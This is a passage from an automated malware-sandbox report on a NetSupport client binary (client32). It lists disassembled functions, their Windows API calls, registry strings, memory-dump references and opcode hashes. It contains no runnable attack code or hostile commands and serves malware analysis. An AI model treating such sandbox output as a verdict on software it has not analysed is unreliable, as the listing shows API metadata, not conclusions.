                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateFileHandle
                                                                                                                                    • String ID: \\.\NSWFPDrv
                                                                                                                                    • API String ID: 3498533004-85019792
                                                                                                                                    • Opcode ID: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                                                                                    • Instruction ID: 8ee41b20f4352974833a803ddfcebdd3f772c34de5b97fa52423d1e1393adc22
                                                                                                                                    • Opcode Fuzzy Hash: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                                                                                    • Instruction Fuzzy Hash: 51D09271A410386AF27055A6AD48F87AD099B026B5F220260B939E658486104D4186E0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1116A373 Relevance: 4.6, APIs: 3, Instructions: 99COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 1116E390: HeapCreate.KERNEL32(00000000,00001000,00000000,1116A38C,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116E399
                                                                                                                                    • GetCommandLineA.KERNEL32(111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116A3AC
                                                                                                                                      • Part of subcall function 11177E54: GetEnvironmentStringsW.KERNEL32(?,?), ref: 11177E5E
                                                                                                                                      • Part of subcall function 11172029: GetStartupInfoW.KERNEL32(?), ref: 11172036
                                                                                                                                      • Part of subcall function 1116C50B: DecodePointer.KERNEL32(00000007,1116A45F,1116A445,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116C51C
                                                                                                                                      • Part of subcall function 1116C50B: TlsFree.KERNEL32(00000026,1116A45F,1116A445,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116C536
                                                                                                                                      • Part of subcall function 1116C50B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,1116A45F,1116A445,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1117448C
                                                                                                                                      • Part of subcall function 1116C50B: DeleteCriticalSection.KERNEL32(00000026,?,?,1116A45F,1116A445,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 111744B6
                                                                                                                                      • Part of subcall function 1117226E: DeleteCriticalSection.KERNEL32(0000000D,00000000,?,1116A42F,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 11172291
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalDeleteSection$CommandCreateDecodeEnvironmentFreeHeapInfoLinePointerStartupStrings
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2772733396-0
                                                                                                                                    • Opcode ID: 78fe073bc8dc6168eb376dc73058150b97c23896d03dcae8d175799f9bb509f8
                                                                                                                                    • Instruction ID: c9d6b6fd0c465be668c0058de01f0e86422888b0ee8161529a650d1a52989a23
                                                                                                                                    • Opcode Fuzzy Hash: 78fe073bc8dc6168eb376dc73058150b97c23896d03dcae8d175799f9bb509f8
                                                                                                                                    • Instruction Fuzzy Hash: 3131093B90A623D6D312BFB36E8865DFA9CAF4122CB254526D865C1144FFE3E470C663
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11163964 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                    • Opcode ID: 77676965e9e40f6af87a66b0b8311ab755c02a438921afc9ee71fd3014ec5639
                                                                                                                                    • Instruction ID: 99a0502aaeb7ade96a4deef53194f79690bd7c081ca6f8299ad08a7ab0eaa67e
                                                                                                                                    • Opcode Fuzzy Hash: 77676965e9e40f6af87a66b0b8311ab755c02a438921afc9ee71fd3014ec5639
                                                                                                                                    • Instruction Fuzzy Hash: 6D110837618637AADB121B74A808649FB9CAF843F8B214126E85D96140FEB2D460CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 111101B0 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                                                    • wsprintfA.USER32 ref: 111101E4
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess
                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                                                                    • API String ID: 3697303334-2664294811
                                                                                                                                    • Opcode ID: 280ad6f88800d969d30347863d68ea4ddbfee66c9be73721bdded0e9d7f91acb
                                                                                                                                    • Instruction ID: 098e5996781ad60247c7fcf5caa4ca36f886f8102b778af333740a2f918ca33d
                                                                                                                                    • Opcode Fuzzy Hash: 280ad6f88800d969d30347863d68ea4ddbfee66c9be73721bdded0e9d7f91acb
                                                                                                                                    • Instruction Fuzzy Hash: C0F0F6B6E4022863C7209AA49D01FEFF37C9F91609F0001A9FE05B7241EA75AA11C7E5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1116C4BA Relevance: 4.5, APIs: 3, Instructions: 16COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • TlsGetValue.KERNEL32(?,1116C613,?,1111023E,?,?,?,?,11145C02,?,?,?,?,?,11146AA3,?), ref: 1116C4C3
                                                                                                                                    • RtlDecodePointer.NTDLL(?,1111023E,?,?,?,?,11145C02,?,?,?,?,?,11146AA3,?,1103179F), ref: 1116C4D5
                                                                                                                                    • TlsSetValue.KERNEL32(00000000,?,1111023E,?,?,?,?,11145C02,?,?,?,?,?,11146AA3,?,1103179F), ref: 1116C4E4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Value$DecodePointer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 721062344-0
                                                                                                                                    • Opcode ID: a6a5336979b6ef7f9d3ce9996c6d3d807e83fa520db65c829f9777c6a10592e9
                                                                                                                                    • Instruction ID: 5e0c0bf803273648c2d68f29e83686a943088977f6c5f399ca43b152bbca2df6
                                                                                                                                    • Opcode Fuzzy Hash: a6a5336979b6ef7f9d3ce9996c6d3d807e83fa520db65c829f9777c6a10592e9
                                                                                                                                    • Instruction Fuzzy Hash: 58D01732842231ABD7235AE19E98956FE65EB44AAA3024130FC3192628CA218C20CB80
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11110430 Relevance: 3.8, APIs: 3, Instructions: 57COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InitializeCriticalSection.KERNEL32(111F1908,20F29797,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110464
                                                                                                                                    • EnterCriticalSection.KERNEL32(111F1908,20F29797,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110480
                                                                                                                                    • LeaveCriticalSection.KERNEL32(111F1908,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 111104C8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3991485460-0
                                                                                                                                    • Opcode ID: 503ed64456695a8aee9ef8790988804961b831d33d68d065787b6580b68da22d
                                                                                                                                    • Instruction ID: 9bba9b476bfc0c868cb30dd48e950e81aed48164d9983b9afed5b510859fa25d
                                                                                                                                    • Opcode Fuzzy Hash: 503ed64456695a8aee9ef8790988804961b831d33d68d065787b6580b68da22d
                                                                                                                                    • Instruction Fuzzy Hash: A8118671B4061AAFE7008FA6CDC4B9AF7A8FB4A755F404239E815A7B44E7355804CBE0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110ED520 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 110ED4E0: RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                                                                                    • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                                                                      • Part of subcall function 110ED2B0: wvsprintfA.USER32 ref: 110ED2DB
                                                                                                                                    Strings
                                                                                                                                    • Error %d Opening regkey %s, xrefs: 110ED54A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseOpenwvsprintf
                                                                                                                                    • String ID: Error %d Opening regkey %s
                                                                                                                                    • API String ID: 1772833024-3994271378
                                                                                                                                    • Opcode ID: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                                                                    • Instruction ID: 5f226866219d47cdc22a26dd3dbb65f90c8b83d3a621ba21e11ce4a3e0407911
                                                                                                                                    • Opcode Fuzzy Hash: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                                                                    • Instruction Fuzzy Hash: D8E092BB6012183FD221961F9C88EEBBB2CDB916A8F01002AFE1487240D972EC00C7B0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110ED4E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                                                                                      • Part of subcall function 110ED2B0: wvsprintfA.USER32 ref: 110ED2DB
                                                                                                                                    Strings
                                                                                                                                    • Error %d closing regkey %x, xrefs: 110ED4FD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Closewvsprintf
                                                                                                                                    • String ID: Error %d closing regkey %x
                                                                                                                                    • API String ID: 843752472-892920262
                                                                                                                                    • Opcode ID: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                                                                                    • Instruction ID: 17a63c7cb3d890cd37713e3b4debf5197f9ef4f9ed7a9792908d4a56e9be20d3
                                                                                                                                    • Opcode Fuzzy Hash: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                                                                                    • Instruction Fuzzy Hash: CFE08C7AA025126BE7359A2EAC18F5BBAE8DFC5314F26056EF890C7201EA70C8008764
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11015530 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(nslsp.dll), ref: 1101553E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID: nslsp.dll
                                                                                                                                    • API String ID: 1029625771-3933918195
                                                                                                                                    • Opcode ID: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
                                                                                                                                    • Instruction ID: c3cee1b6b22d45073264887edccfc8dbbb46eef3a7360ad418ef0f3f90be1ef1
                                                                                                                                    • Opcode Fuzzy Hash: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
                                                                                                                                    • Instruction Fuzzy Hash: BBC08C702006245BE3900F48BC04081F694AF04900300882AE070C3600D160A8008F80
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11145240 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesA.KERNEL32(11145918,00000000,?,11145918,00000000), ref: 1114525C
                                                                                                                                      • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                      • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                    • CreateDirectoryA.KERNEL32(11145918,00000000,?,?,?,11145918,00000000), ref: 111452B7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AttributesCreateDirectoryErrorFileFreeHeapLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3986419549-0
                                                                                                                                    • Opcode ID: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
